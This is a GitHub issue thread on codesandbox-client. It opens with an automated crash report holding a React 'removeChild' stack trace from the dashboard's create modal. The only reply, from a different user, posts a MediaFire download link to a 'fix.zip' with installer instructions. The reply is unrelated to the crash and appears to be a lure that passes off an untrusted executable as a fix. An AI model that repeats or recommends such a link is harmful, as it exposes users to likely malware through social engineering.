### ISSUE TITLE
triste

### ISSUE THREAD

**Issue by Jonascosta06** [codesandbox/codesandbox-client#8557]
<h1>💥 Crash Report</h1>

  <h2>What were you trying to accomplish when the crash occurred?</h2>

  > Please use this issue template to describe what you were doing when you encountered this crash. While we are able to fill in some details automatically, it's not always enough to reproduce!

  <h3>Link to sandbox: [link]() (optional)</h3>

  <h3>Crash Details</h3>

  <details>
  <summary>Environment</summary>

  | Browser |  Version  | Operating System | CodeSandbox Version |
  | ------- | --------- | ---------------- | ------------------- |
  | chrome | 128.0.0 | Windows 10           | 84311d68c          |

  **Route:**
  https://codesandbox.io/dashboard/recent?create=true

  **Error Code:**
67f510fc30ca49ffb8d3f3fefd9f16b5

  </details>

  <details>
  <summary>Error Message</summary>

  ```bash
  NotFoundError: Failed to execute 'removeChild' on 'Node': The node to be removed is not a child of this node.
  Error: Failed to execute 'removeChild' on 'Node': The node to be removed is not a child of this node.
    at ya (https://codesandbox.io/static/js/common.67289e494.chunk.js:1:1986545)
    at yl (https://codesandbox.io/static/js/common.67289e494.chunk.js:1:2005465)
    at https://codesandbox.io/static/js/common.67289e494.chunk.js:1:2026939
    at qo (https://codesandbox.io/static/js/common.67289e494.chunk.js:1:1951666)
    at bl (https://codesandbox.io/static/js/common.67289e494.chunk.js:1:2003352)
    at il (https://codesandbox.io/static/js/common.67289e494.chunk.js:1:1993714)
    at https://codesandbox.io/static/js/common.67289e494.chunk.js:1:1951957
    at https://codesandbox.io/static/js/common.67289e494.chunk.js:1:2026939
    at qo (https://codesandbox.io/static/js/common.67289e494.chunk.js:1:1951666)
    at $o (https://codesandbox.io/static/js/common.67289e494.chunk.js:1:1951902)
    at Yo (https://codesandbox.io/static/js/common.67289e494.chunk.js:1:1951837)
    at ae (https://codesandbox.io/static/js/common.67289e494.chunk.js:1:2020714)
    at kn (https://codesandbox.io/static/js/common.67289e494.chunk.js:1:1935510)
    at HTMLFormElement.r (https://codesandbox.io/static/js/common.67289e494.chunk.js:1:259203)
  
    in button
    in styled.div
    in ForwardRef
    in div
    in CreateBoxForm___StyledStack4
    in div
    in Styled(styled.div)
    in form
    in CreateBoxForm___StyledElement
    in ee
    in div
    in elements__ModalContent
    in div
    in elements__ModalBody
    in div
    in elements__Container
    in Ie
    in Unknown
    in ze
    in Be
    in div
    in div
    in Modal___StyledElement
    in div
    in div
    in t
    in t
    in Modal___StyledModal
    in k
    in Ie
    in Unknown
    in du
    in De
    in withRouter(De)
    in div
    in elements__Container
    in Unknown
    in withRouter()
    in t
    in Unknown
    in Ie
    in c
    in t
  ```

  </details>

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."
